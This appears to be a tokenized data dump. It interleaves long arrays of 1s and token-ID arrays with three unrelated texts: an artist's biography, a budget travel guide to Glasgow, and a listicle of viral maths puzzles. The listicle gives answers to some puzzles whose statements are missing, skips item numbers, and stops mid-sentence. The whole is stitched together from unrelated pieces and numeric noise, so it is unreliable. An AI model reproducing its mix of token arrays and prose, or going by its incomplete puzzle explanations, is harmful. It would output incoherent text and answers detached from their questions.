1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Alberg. Born in PARIS into 1955 from a mother painter, then having lived more than 30 years in AFRICA, where I developed various techniques oils, acrylic, ceramic painting ect… on various supports, enamels on wood, on metal, porcelains, ceramics and fabrics. Alain BERGER lives in MARSEILLES and sign his works with the pseudo ALBERG.
[ 1, 838, 2552, 29889, 13, 13, 29933, 1398, 297, 349, 1718, 3235, 964, 29871, 29896, 29929, 29945, 29945, 515, 263, 5637, 23187, 29892, 769, 2534, 10600, 901, 1135, 29871, 29941, 29900, 2440, 297, 319, 15860, 2965, 29909, 29892, 988, 306, 8906, 5164, 13698, 288, 2719, 29892, 1274, 719, 506, 29892, 5147, 314, 293, 20413, 321, 312, 30098, 373, 5164, 11286, 29892, 427, 314, 1379, 373, 8112, 29892, 373, 11915, 29892, 1277, 2242, 2708, 29892, 5147, 314, 1199, 322, 10135, 10817, 29889, 13, 13, 29909, 7420, 350, 1001, 17070, 12080, 297, 23851, 1660, 6227, 17101, 322, 1804, 670, 1736, 411, 278, 17381, 14445, 13635, 29954, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
At first glance, the Victorian architecture of the city might evoke the sombre days of the past when the trade and manufacturing industries characterised the landscape, but look a little closer and you will discover a city dotted with picturesque green spaces, fantastic shopping and a thriving cultural scene begging to be explored. What's more, a visit to Glasgow is surprisingly affordable – the city offers plenty for those travelling on a shoestring – here's our top pick of things to do in Glasgow that won't burn a hole in your pocket: #1. Explore the Gothic quarter Proving that there are sights to see in Glasgow that pre-date the Industrial Revolution, the cathedral precinct located in the city's East End offers a fascinating glimpse into the past. Glasgow Cathedral and the nearby Necropolis (inspired by the famous Pere Lachaise in Paris) are achingly beautiful examples of Scottish Gothic architecture and the city's rich history. #2. Take a Mackintosh tour The architect Charles Rennie Mackintosh is inextricably associated with Glasgow – his creative designs can be seen scattered throughout the city and make for an excellent walking tour as you tick them off your sight-seeing list. Queen's Cross Church, the Willow Tea Rooms and Scotland's School of Art (pictured) are some examples of his work – visit the Glasgow Information Centre for more on available tours of his buildings. #3. Become a culture vulture One of the most popular of Glasgow's galleries and museums is the Kelvingrove Art Gallery and Museum (pictured). Its vast collection, housed in a gorgeous Baroque building, includes a Salvador Dali masterpiece and Sir Roger the stuffed elephant. Other great options include the Riverside Museum's transport and travel exhibits; the archeological world finds at the Hunterian Museum and Art Gallery; the Centre for Contemporary Art; and the Gallery of Modern Art. All are free or offer concessionary rates, so the price is certainly right. #4. Watch a play with a pie and a pint Theatre-goers on a budget might want to check what's on at arts venue Oran Mor (pictured). Based in Glasgow's West End in an atmospheric Victorian church, the venue hosts a regular lunchtime slot where a ticket buys you a play with a pie and a pint, wine or soft drink. Writers range from well-known Scottish playwrights to newcomers. #5. Relax in Glasgow's green spaces Take a break from the city streets and relax in a green Glaswegian oasis. Pollok Country Park (pictured) offers 146 hectares of parkland just a ten minute train ride from the city centre, with a grand 18th century home and the nearby Burrell art collection to enjoy. Kelvingrove Park offers nature trails and a picturesque, riverside setting whilst the Botanic Gardens boasts an opulent Victorian greenhouse as well as dazzling Winter Gardens filled with exotic plants. Alternatively, just out of town, ramblers can enjoy miles of woodland walks along the River Avon. The opinions expressed are those of the author and are not held by Saga unless specifically stated. The material is for general information only and does not constitute investment, tax, legal, medical or other form of advice. You should not rely on this information to make (or refrain from making) any decisions. Always obtain independent, professional advice for your own particular situation.
[ 1, 2180, 937, 21798, 29892, 278, 12684, 713, 11258, 310, 278, 4272, 1795, 321, 5744, 278, 1047, 1030, 3841, 310, 278, 4940, 746, 278, 11302, 322, 12012, 3864, 6397, 2722, 2931, 3368, 278, 24400, 29892, 541, 1106, 263, 2217, 17649, 322, 366, 674, 6523, 263, 4272, 270, 15048, 411, 14956, 802, 7933, 8162, 29892, 13568, 6288, 17394, 3262, 322, 263, 266, 1150, 292, 16375, 9088, 25945, 292, 304, 367, 3902, 4395, 29889, 13, 13, 5618, 29915, 29879, 901, 29892, 263, 6493, 304, 29196, 338, 26800, 368, 21750, 519, 785, 278, 4272, 16688, 20947, 363, 1906, 6427, 7807, 373, 263, 17394, 342, 5393, 785, 1244, 29915, 29879, 1749, 2246, 5839, 310, 2712, 304, 437, 297, 29196, 393, 2113, 29915, 29873, 12138, 263, 16188, 297, 596, 24589, 29901, 13, 13, 29937, 29896, 29889, 1222, 572, 487, 278, 22883, 293, 12616, 13, 13, 1184, 1747, 393, 727, 526, 269, 5861, 304, 1074, 297, 29196, 393, 758, 29899, 1256, 278, 12157, 9315, 14595, 29892, 278, 274, 21471, 8303, 5562, 5982, 297, 278, 4272, 29915, 29879, 6932, 2796, 16688, 263, 21028, 262, 1218, 330, 12552, 344, 964, 278, 4940, 29889, 29196, 315, 21471, 322, 278, 20810, 405, 687, 10759, 275, 313, 262, 1028, 2859, 491, 278, 13834, 23133, 365, 496, 29874, 895, 297, 3681, 29897, 526, 3657, 11687, 9560, 6455, 310, 17780, 22883, 293, 11258, 322, 278, 4272, 29915, 29879, 8261, 4955, 29889, 13, 13, 29937, 29906, 29889, 11190, 263, 21343, 524, 10578, 6282, 13, 13, 1576, 6956, 5322, 390, 2108, 347, 21343, 524, 10578, 338, 297, 1062, 2200, 2197, 6942, 411, 29196, 785, 670, 907, 1230, 25517, 508, 367, 3595, 29574, 10106, 278, 4272, 322, 1207, 363, 385, 15129, 22049, 6282, 408, 366, 16892, 963, 1283, 596, 11126, 29899, 4149, 292, 1051, 29889, 13, 13, 8654, 264, 29915, 29879, 11189, 6291, 29892, 278, 2811, 340, 1920, 29874, 1528, 4835, 322, 15226, 29915, 29879, 4523, 310, 3012, 313, 29886, 919, 2955, 29897, 526, 777, 6455, 310, 670, 664, 785, 6493, 278, 29196, 10343, 11319, 363, 901, 373, 3625, 260, 2470, 310, 670, 13814, 29889, 13, 13, 29937, 29941, 29889, 1522, 2763, 263, 9257, 325, 12896, 13, 13, 6716, 310, 278, 1556, 5972, 310, 29196, 29915, 29879, 11798, 6358, 322, 19133, 29879, 338, 278, 27326, 1747, 307, 345, 3012, 15230, 322, 6838, 313, 29886, 919, 2955, 467, 8011, 13426, 4333, 29892, 9261, 287, 297, 263, 330, 3890, 681, 2261, 29877, 802, 5214, 29892, 7805, 263, 22194, 360, 2606, 5835, 12343, 346, 322, 6290, 14159, 278, 6433, 287, 4552, 561, 424, 29889, 13, 13, 16107, 2107, 3987, 3160, 278, 390, 1536, 680, 6838, 29915, 29879, 8608, 322, 9850, 10371, 1169, 29936, 278, 564, 1173, 5996, 3186, 14061, 472, 278, 25703, 713, 6838, 322, 3012, 15230, 29936, 278, 11319, 363, 27183, 653, 3012, 29936, 322, 278, 15230, 310, 14624, 3012, 29889, 2178, 526, 3889, 470, 5957, 378, 985, 291, 653, 19257, 29892, 577, 278, 8666, 338, 8959, 1492, 29889, 13, 13, 29937, 29946, 29889, 24274, 263, 1708, 411, 263, 5036, 322, 263, 16483, 13, 13, 1576, 6064, 29899, 1484, 414, 373, 263, 23562, 1795, 864, 304, 1423, 825, 29915, 29879, 373, 472, 16930, 6003, 434, 438, 661, 3879, 313, 29886, 919, 2955, 467, 13, 13, 29933, 1463, 297, 29196, 29915, 29879, 3122, 2796, 297, 385, 15489, 8096, 293, 12684, 713, 6586, 29892, 278, 6003, 434, 18982, 263, 4943, 301, 3322, 2230, 21497, 988, 263, 23381, 1321, 952, 366, 263, 1708, 411, 263, 5036, 322, 263, 16483, 29892, 19006, 470, 4964, 13748, 29889, 16849, 414, 3464, 515, 1532, 29899, 5203, 17780, 1708, 29893, 1266, 29879, 304, 716, 510, 414, 29889, 13, 13, 29937, 29945, 29889, 6376, 1165, 297, 29196, 29915, 29879, 7933, 8162, 13, 13, 26772, 263, 2867, 515, 278, 4272, 19756, 322, 26681, 297, 263, 7933, 19286, 7872, 713, 288, 25101, 29889, 2043, 417, 29895, 15456, 4815, 313, 29886, 919, 2955, 29897, 16688, 29871, 29896, 29946, 29953, 28834, 5114, 310, 14089, 1049, 925, 263, 3006, 11015, 7945, 22203, 515, 278, 4272, 8442, 29892, 411, 263, 4595, 29871, 29896, 29947, 386, 6462, 3271, 322, 278, 20810, 6640, 15044, 1616, 4333, 304, 13389, 29889, 13, 13, 29968, 295, 1747, 307, 345, 4815, 16688, 5469, 1020, 2719, 322, 263, 14956, 802, 29892, 27515, 680, 4444, 21109, 278, 26035, 293, 15971, 575, 1045, 19416, 385, 1015, 352, 296, 12684, 713, 7933, 8697, 408, 1532, 408, 270, 7511, 1847, 12267, 15971, 575, 10423, 411, 429, 13574, 18577, 29889, 20360, 29892, 925, 714, 310, 4726, 29892, 364, 1117, 9306, 508, 13389, 7800, 310, 8112, 1049, 17042, 2039, 3412, 278, 6163, 7740, 265, 29889, 13, 13, 1576, 26971, 13384, 526, 1906, 310, 278, 4148, 322, 526, 451, 4934, 491, 317, 7781, 6521, 10816, 8703, 29889, 13, 13, 1576, 5518, 338, 363, 2498, 2472, 871, 322, 947, 451, 1040, 12356, 13258, 358, 29892, 8818, 29892, 11706, 29892, 16083, 470, 916, 883, 310, 9848, 29889, 887, 881, 451, 19104, 373, 445, 2472, 304, 1207, 313, 272, 2143, 6038, 515, 3907, 29897, 738, 1602, 12112, 29889, 29849, 4017, 7417, 29892, 10257, 9848, 363, 596, 1914, 3153, 6434, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
People couldn't get enough of math questions this year as they debated the answers in Twitter threads and parenting forums. But they also lamented how much the complicated problems made their brains hurt. This Chinese math question for fifth graders stumped adults. The problem translates to: "If a ship had 26 sheep and 10 goats onboard, how old is the ship's captain?" How is the amount of cargo a ship contains supposed to help you figure out how old the captain is? The internet had a lot to say about this seemingly impossible math question, which became a trending topic on Twitter. After the test question went viral, the Shunqing Education Department released a statement saying that the question was meant to gauge "critical awareness and an ability to think independently," according to a BBC translation. 3/ This second grade math problem left the internet seriously confused. Second graders should be able to solve this. INSIDER The question is: "There are 49 dogs signed up to compete in the dog show. There are 36 more small dogs than large dogs signed up to compete. How many small dogs are signed up to compete?" Popular reasoning was that if there are 49 dogs total, and there are 36 more small dogs than large dogs, you'd subtract 36 from 49. By that measure, there are 13 large dogs and 36 small dogs, meaning the answer is 36. But seeing as that would mean there are 23 more small dogs than large dogs, that isn't right. The teacher who gave the question later told Popsugar, "The district worded it wrong." But as it stands, the answer is 42.5: 49 - 36 = 13, 13 / 2 = 6.5, and 36 + 6.5 = 42.5. Apparently, half of a dog competed at the dog show. 4/ People couldn't agree on the answer to a question about buying and selling horses. Here's the question: "A man buys a horse for $60. He sells the horse for $70. He then buys the horse back for $80. And he sells the horse again for $90. In the end, how much money did the man make or lose? Or did he break even?" Answers in the Mumsnet thread ranged from making $10, $20, and $30 to breaking even. So what's the solution? What seems to be throwing people off is the fact that the man sells the horse for $70 and then buys it back for $80, making it look like he spent $10 more. But the correct way to solve the problem is to think of the two transactions as separate: -60 + 70 = 10 and -80 + 90 = 10. The man makes $10 with each sale, therefore he earns a total of $20. 5/ Author Ed Southall shared a math problem on Twitter that some people managed to get right. Ed Southall, author of "Geometry Snacks," shared a photo of a pink triangle inside a square and challenged people to figure out how much of the square is shaded pink. Some Twitter users gave up immediately, but others rose to the challenge. According to Business Insider's quant reporter, Andy Kiersz, the key to solving the problem is the height of the pink triangle. The area of a triangle is 1/2 (base x height). If we assume that the square is a 1 x 1 unit, we can see that the base of the pink triangle is 1, the length of the square. All we need to figure out is the height. "The key trick is that the little triangle up top is similar to the pink triangle, which means that the little triangle is just a smaller version of the pink triangle," Kiersz said. "A property of similar triangles is that the ratio of the triangles' heights will be the same as the ratio of their bases," he said. "Since the pink triangle's base is twice the little triangle's base, its height is also twice the little triangle's height. But we know that the little triangle's height plus the pink triangle's height is 1, so that means the pink triangle's height is 2/3. Plug that on in and we get our area = 1/2 x base x height = 1/2 x 1 x 2/3 = 1/3." According to Talwalkar, the easiest way to answer the first question about when the lights will all be off is to map out the intervals for each lighthouse and see where their "off" sections overlap. The answer: after five seconds, when the third light has just turned off and the first and second lights are still off. To determine when all of the lights will come on together, you need to find the smallest common multiple of the intervals when the lights will be on. The answer to that question is that the lighthouses will all come on together at 120 seconds, or two minutes. The brainteaser consists of four math equations, each of which adds to or multiplies a numerical sum or product. In place of variables like x or y, however, the brainteaser substitutes ice cream cones that are either empty or have scoops of white ice cream, pink ice cream, or both. To solve the puzzle, you have to figure out what number the empty ice cream cones, white ice cream scoops, and pink ice cream scoops each represent. The answer is that the empty ice cream cone represents the number three, the white ice cream scoop represents the number two, and the pink ice cream scoop represents the number one. 8/ A Quora thread of difficult SAT math questions included one people called the "meanest test problem ever." There are a few ways to solve it, but Talwalkar presented a simple shortcut. The first class had an average of 70. That's 16 points below the average score of 86. In other words, 86 - 70 = 16. Since there are p students in the class, the difference from the average is 16 p. The second class had an average of 92. That's 6 points more than the average of 86. In other words, 92 - 86 = 6. There are n students in this class, so the difference from the average is 6 n. Because these classes average out together — as the problem says, "when the scores of the two classes are combined" — the deficit of points has to be equal to the surplus of points. Therefore, 16 p is equal to 6 n. Turning that into an equation, we can easily figure out what p/n is: 16 p = 6 n p/n = 6/16, or 3/8. 9/ A British mathematician says he solved the "single most important open problem" in math after 160 years, but it still needs to be peer reviewed. The $1 million prize goes to whoever can prove that the equation applies to all prime numbers. British mathematician Sir Michael Atiyah said he solved the 160-year-old problem, but his solution needs to be peer 